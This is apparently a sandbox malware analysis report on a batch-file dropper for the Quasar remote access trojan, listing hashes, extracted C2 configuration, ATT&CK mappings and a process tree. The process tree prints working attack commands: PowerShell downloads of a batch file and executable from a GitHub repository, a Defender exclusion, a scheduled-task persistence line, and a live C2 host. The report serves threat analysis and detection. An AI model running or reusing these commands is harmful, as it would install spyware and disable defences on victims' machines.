quasar | ec2f7e6633f2eb4214371bc3701342599d6cfa0d6d94cd0b0f0c77e78d2bcd6c

General

Target

main.bat
Size

5KB
MD5

9079b22a006d46af116cd7f27534f131
SHA1

9f9fd7a2234cad3de7ea9acf55c05034d124c6e2
SHA256

ec2f7e6633f2eb4214371bc3701342599d6cfa0d6d94cd0b0f0c77e78d2bcd6c
SHA512

cd36c23a25031056c74c38212f859b0ce78556347c60ab2b797743fc821676a0df633b66acbbc6812e2b696560df941af1208f284d5176d4ac083ecdd88375c8
SSDEEP

24:6I5MGfsNZSp805N0DW0i0+0eW000vZ0/W0w0bw0noW0KUQ0q+w0wW0z0a0lW0ujs:6R8sNZSptWM5m1otCigAq0

Score

10^/10

quasar bot defense_evasion discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes

encryption_key
E83D6FC31962786DAEA703F111D2381786DF06CA
install_name
Modification1.5.14.12.exe
log_directory
Logs
reconnect_delay
3126
startup_key
explorer.dll
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe	family_quasar
behavioral1/memory/1656-47-0x0000000000740000-0x0000000000A64000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

2 2012 powershell.exe
3 2240 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2240 powershell.exe
2012 powershell.exe
2868 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

pid process

1656 Modification11910275.exe
3744 Modification1.5.14.12.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
2 raw.githubusercontent.com
3 raw.githubusercontent.com

flow	pid	process
2	2012	powershell.exe
3	2240	powershell.exe

pid	process
2240	powershell.exe
2012	powershell.exe
2868	powershell.exe

pid	process
1656	Modification11910275.exe
3744	Modification1.5.14.12.exe

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in System32 directory 5 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

description	ioc	process
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification1.5.14.12.exe
File opened for modification	C:\Windows\system32\SubDir	Modification1.5.14.12.exe
File created	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
defense_evasion

Ignore Process Interrupts
T1564.011

Processes:

powershell.exe

pid process

2488 powershell.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

4720 PING.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4720 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

4880 schtasks.exe
4852 schtasks.exe

pid	process
2488	powershell.exe

pid	process
4720	PING.EXE

pid	process
4720	PING.EXE

pid	process
4880	schtasks.exe
4852	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2012	powershell.exe
2012	powershell.exe
2868	powershell.exe
2868	powershell.exe
2240	powershell.exe
2240	powershell.exe
2488	powershell.exe
2488	powershell.exe
2488	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeModification11910275.exeModification1.5.14.12.exe

description	pid	process
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	1656	Modification11910275.exe
Token: SeDebugPrivilege	3744	Modification1.5.14.12.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Modification1.5.14.12.exe

pid process

3744 Modification1.5.14.12.exe

pid	process
3744	Modification1.5.14.12.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

cmd.execmd.exeModification11910275.exeModification1.5.14.12.exe

description	pid	process	target process
PID 3488 wrote to memory of 2012	3488	cmd.exe	powershell.exe
PID 3488 wrote to memory of 2012	3488	cmd.exe	powershell.exe
PID 3488 wrote to memory of 3064	3488	cmd.exe	cmd.exe
PID 3488 wrote to memory of 3064	3488	cmd.exe	cmd.exe
PID 3064 wrote to memory of 2680	3064	cmd.exe	cacls.exe
PID 3064 wrote to memory of 2680	3064	cmd.exe	cacls.exe
PID 3488 wrote to memory of 4720	3488	cmd.exe	PING.EXE
PID 3488 wrote to memory of 4720	3488	cmd.exe	PING.EXE
PID 3064 wrote to memory of 2868	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2868	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2240	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2240	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 1656	3064	cmd.exe	Modification11910275.exe
PID 3064 wrote to memory of 1656	3064	cmd.exe	Modification11910275.exe
PID 3064 wrote to memory of 2488	3064	cmd.exe	powershell.exe
PID 3064 wrote to memory of 2488	3064	cmd.exe	powershell.exe
PID 1656 wrote to memory of 4880	1656	Modification11910275.exe	schtasks.exe
PID 1656 wrote to memory of 4880	1656	Modification11910275.exe	schtasks.exe
PID 1656 wrote to memory of 3744	1656	Modification11910275.exe	Modification1.5.14.12.exe
PID 1656 wrote to memory of 3744	1656	Modification11910275.exe	Modification1.5.14.12.exe
PID 3744 wrote to memory of 4852	3744	Modification1.5.14.12.exe	schtasks.exe
PID 3744 wrote to memory of 4852	3744	Modification1.5.14.12.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K installer.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:2680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Set-MpPreference -ExclusionExtension exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2240
- - C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
    Modification11910275.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4880
  - - C:\Windows\system32\SubDir\Modification1.5.14.12.exe
      "C:\Windows\system32\SubDir\Modification1.5.14.12.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3744
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-Process cmd -ErrorAction SilentlyContinue | ForEach-Object { $_.Kill() }"
    3⤵
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2488
- C:\Windows\system32\PING.EXE
  ping localhost -n 10
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Hide Artifacts

1

T1564

Ignore Process Interrupts

1

T1564.011

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d405540758f0f5bdaab94f1a054cc67d

SHA1
07e307420a26d17c2dc1226af6e72018da4ae26c

SHA256
2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61

SHA512
59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
76750f7f07cf1179dc12eaca195b04d3

SHA1
a3f7810796b486dbbc85b70f9f41d318afa54363

SHA256
d0fff09010a07f157a3f5eaf17c1cbc46e17a9a676ff485e8a194618b8fee7a4

SHA512
10872b40830ef3832a0a081d16cd7631d42bbf4c5bd773849fa434b2cfc0d94c76cd4bffb1f30e22f0999ca41368719310cb36011f63b4eba5298978304d90f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb3940ce7aa1442ba39acf9a56821e16

SHA1
5451591d3a83e688efc035e9ba483a603e8d156d

SHA256
b377a698710216900c6464057057ea83f2975650d6e8d9664805505e7840c33f

SHA512
35b5c04476adfd710de8760d0758198cbd4a65abc8905d6e534e143eeb539537ac76b75a1bd5ff7788fe346c9b0afd42a3eb65373d2ba4286bf840a6c126f3af

Download Submit
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe

Filesize
3.1MB

MD5
fa9b1524e725c4a251d07007f15fa947

SHA1
5c023619d8180b611acb544fa1cd8bd31de9e61c

SHA256
0cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec

SHA512
dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vrp0swlj.gs3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\installer.bat

Filesize
1KB

MD5
43bd9a829d434583f1c14da28dca72f6

SHA1
8fac8d694f4c15d42458bdc5540e0547cb88c83c

SHA256
be6d97cbf700b60bb57bf24889af41c0e3e4d3c70800bc164ef71a0608beb6df

SHA512
2bbb73cf8c2a6d0e61ec58b2a125240daf73c87742f377fc2aede5ce24e11f492044b47c98918168148c632b2c4f3f058feef45479265dd51951aac8ceb585da

Download Submit
memory/1656-47-0x0000000000740000-0x0000000000A64000-memory.dmp

Filesize
3.1MB

Download
memory/2012-12-0x00007FFE826F0000-0x00007FFE831B2000-memory.dmp

Filesize
10.8MB

Download
memory/2012-16-0x00007FFE826F0000-0x00007FFE831B2000-memory.dmp

Filesize
10.8MB

Download
memory/2012-0-0x00007FFE826F3000-0x00007FFE826F5000-memory.dmp

Filesize
8KB

Download
memory/2012-11-0x00007FFE826F0000-0x00007FFE831B2000-memory.dmp

Filesize
10.8MB

Download
memory/2012-10-0x00007FFE826F0000-0x00007FFE831B2000-memory.dmp

Filesize
10.8MB

Download
memory/2012-1-0x000002CC48A20000-0x000002CC48A42000-memory.dmp

Filesize
136KB

Download
memory/2868-19-0x00007FFE826F0000-0x00007FFE831B2000-memory.dmp

Filesize
10.8MB

Download
memory/2868-25-0x00007FFE826F0000-0x00007FFE831B2000-memory.dmp

Filesize
10.8MB

Download
memory/2868-30-0x00007FFE826F0000-0x00007FFE831B2000-memory.dmp

Filesize
10.8MB

Download
memory/2868-32-0x00007FFE826F0000-0x00007FFE831B2000-memory.dmp

Filesize
10.8MB

Download
memory/3744-64-0x000000001B7D0000-0x000000001B820000-memory.dmp

Filesize
320KB

Download
memory/3744-65-0x000000001B8E0000-0x000000001B992000-memory.dmp

Filesize
712KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads